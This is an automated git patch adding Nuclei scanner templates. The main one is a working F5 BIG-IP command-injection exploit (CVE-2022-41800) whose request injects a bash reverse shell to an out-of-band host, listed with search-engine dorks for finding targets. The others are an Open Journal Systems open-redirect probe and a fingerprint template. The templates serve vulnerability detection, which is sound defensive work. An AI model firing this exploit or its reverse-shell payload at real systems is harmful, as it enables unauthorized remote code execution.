From 4e15d9af34057e13fe3a944558f95f5646c07455 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 3 Dec 2024 12:41:23 +0000 Subject: [PATCH] Auto Update Nuclei [Tue Dec 3 12:41:23 UTC 2024] :robot: --- .../experience_manager/CVE-2019-16469.yaml | 2 +- plugins/apache/solr/CVE-2024-45216.yaml | 2 +- .../CVE-2022-41800.yaml | 102 ++++++++++++++++++ .../pkp-lib-open-redirect.yaml | 30 ++++++ .../open_journal_systems.yaml | 22 ++++ 5 files changed, 156 insertions(+), 2 deletions(-) create mode 100644 plugins/f5/big-ip_access_policy_manager/CVE-2022-41800.yaml create mode 100644 plugins/public_knowledge_project/open_journal_systems/pkp-lib-open-redirect.yaml create mode 100644 web-fingerprint/public_knowledge_project/open_journal_systems.yaml diff --git a/plugins/adobe/experience_manager/CVE-2019-16469.yaml b/plugins/adobe/experience_manager/CVE-2019-16469.yaml index 3fde5a0da..4190fc9a1 100644 --- a/plugins/adobe/experience_manager/CVE-2019-16469.yaml +++ b/plugins/adobe/experience_manager/CVE-2019-16469.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b8107c5947766cf2638bfdd0e4a92732bf4e18779ff1aad867c74a49ddf6013402206a666dc4c99eedfb76b4f1461f4aaea2fab88cb8a06c6b08202e181eca195760:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210082a6643645b37e01702752b369d5254b3ae3d9f54ebe564751e3ba7fa7b50d75022100b5ec6f99589fd782251e81288b7f5371de99c72c79d0a95e80a956314b737dd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/plugins/apache/solr/CVE-2024-45216.yaml b/plugins/apache/solr/CVE-2024-45216.yaml index 0276b7486..368b6ceff 100644 --- a/plugins/apache/solr/CVE-2024-45216.yaml +++ b/plugins/apache/solr/CVE-2024-45216.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ae5bd685c595998e6ed0fd5828e7a2f3a5988569acecbdf4e33d8f6e56793db9022019a245a90b88bbe1fb3294adf2d31a394ef37202bdb7320ef69604e7e4ed0020:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009b754f6c37b0d92438636734fe3b337640249ddb1cdde8b77ae21fed14a9885602206fa4c72b7d7d5ef40885c9be4956f9b87c0d9045db5e3daf60096887a947adb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/plugins/f5/big-ip_access_policy_manager/CVE-2022-41800.yaml b/plugins/f5/big-ip_access_policy_manager/CVE-2022-41800.yaml new file mode 100644 index 000000000..c06563037 --- /dev/null +++ b/plugins/f5/big-ip_access_policy_manager/CVE-2022-41800.yaml @@ -0,0 +1,102 @@ +id: CVE-2022-41800 + +info: + name: F5 BIG-IP Appliance Mode - Command Injection + author: dwisiswant0 + severity: high + description: | + When running in Appliance mode, an authenticated user assigned the Administrator role may bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. + impact: | + A successful exploit can allow the attacker to execute remote commands on server using authorization bypass (CVE-2022-1388). + reference: + - https://attackerkb.com/topics/ZClTQn4aG4/cve-2022-41800/rapid7-analysis + - https://support.f5.com/csp/article/K97843387 + - https://support.f5.com/csp/article/K13325942 + - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/ + - https://nvd.nist.gov/vuln/detail/cve-2022-41800 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N + cvss-score: 8.7 + cve-id: CVE-2022-41800 + cwe-id: CWE-77 + epss-score: 0.0109 + epss-percentile: 0.84818 + cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + verified: true + vendor: f5 + product: big-ip_access_policy_manager + shodan-query: + - http.title:"big-ip®-+redirect" +"server" + - http.html:"big-ip apm" + fofa-query: + - body="big-ip apm" + - title="big-ip®-+redirect" +"server" + google-query: intitle:"big-ip®-+redirect" +"server" + tags: cve,cve2022,rce,f5,bigip,instrusive + +variables: + auth: "admin:{{rand_text_alpha(1)}}" + rand_app: "{{to_lower(rand_text_alpha(6))}}" + rand_ver: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}" + rand_rel: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}" + +http: + - raw: + - | + POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1 + Host: {{Hostname}} + X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}} + Authorization: Basic {{base64(auth)}} + Content-Type: application/json + Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host + + { + "specFileData": { + "name": "{{rand_app}}", + "srcBasePath": "/tmp", + "version": "{{rand_ver}}", + "release": "{{rand_rel}}", + "description": "\n\n%check\nbash -i >& /dev/tcp/{{interactsh-url}}/{{rand_text_numeric(4)}} 0>&1", + "summary": "{{to_lower(rand_text_alphanumeric(10))}}" + } + } + + - | + POST /mgmt/shared/iapp/build-package HTTP/1.1 + Host: {{Hostname}} + X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}} + Authorization: Basic {{base64(auth)}} + Content-Type: application/json + Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host + + { + "state": {}, + "appName": "{{rand_app}}", + "packageDirectory": "/tmp", + "specFilePath": "{{spec}}", + "force": true + } + + extractors: + - type: json + part: body + name: spec + json: + - ".specFilePath" + internal: true + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: body + words: + - "RUN_BUILD_RPM_TASK" + - "shared:iapp:build-package:buildrpmtaskstate" +# digest: 4a0a00473045022100a57e06512c7cc80aef74d56ff148ef58a0f939b086187a95fd62f41c7262294002203fef201e4c490cae24a33d78bc67b26465f0588c882a57e4af211ca22aafd40c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/plugins/public_knowledge_project/open_journal_systems/pkp-lib-open-redirect.yaml b/plugins/public_knowledge_project/open_journal_systems/pkp-lib-open-redirect.yaml new file mode 100644 index 000000000..2d38a504a --- /dev/null +++ b/plugins/public_knowledge_project/open_journal_systems/pkp-lib-open-redirect.yaml @@ -0,0 +1,30 @@ +id: pkp-lib-open-redirect + +info: + name: Open Journal Systems pkp-lib - Open Redirect + author: ritikchaddha + severity: medium + description: | + Public Knowledge Project pkp-lib is vulnerable to Open redirect due to a lack of input sanitization in the setLocale function. + reference: + - https://github.com/pkp/pkp-lib/issues/7575 + classification: + cpe: cpe:2.3:a:public_knowledge_project:open_journal_systems:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: public_knowledge_project + product: open_journal_systems + fofa-query: body="pkp-lib" + tags: pkp,ojs,open-journal-system,pkp-lib,redirect + +http: + - method: GET + path: + - "{{BaseURL}}/index.php/index/user/setLocale/NEW_LOCALE?source=@oast.me" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*){{Hostname}}@?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' +# digest: 4a0a0047304502206f7c2a55023e27e8d5b8017b9af1487fa60a457332f3de1772a0a52f44844e36022100def384ea2602620751e108152dc6f80e18253d8b8a6d926fc895b4ca8799e46b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/web-fingerprint/public_knowledge_project/open_journal_systems.yaml b/web-fingerprint/public_knowledge_project/open_journal_systems.yaml new file mode 100644 index 000000000..cd2516b72 --- /dev/null +++ b/web-fingerprint/public_knowledge_project/open_journal_systems.yaml @@ -0,0 +1,22 @@ +id: open_journal_systems +info: + name: open_journal_systems + author: cn-kali-team + tags: detect,tech,open_journal_systems + severity: info + metadata: + fofa-query: + - body="pkp-lib" + product: open_journal_systems + shodan-query: + - cpe:"cpe:2.3:a:public_knowledge_project:open_journal_systems" + vendor: public_knowledge_project + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - pkp-lib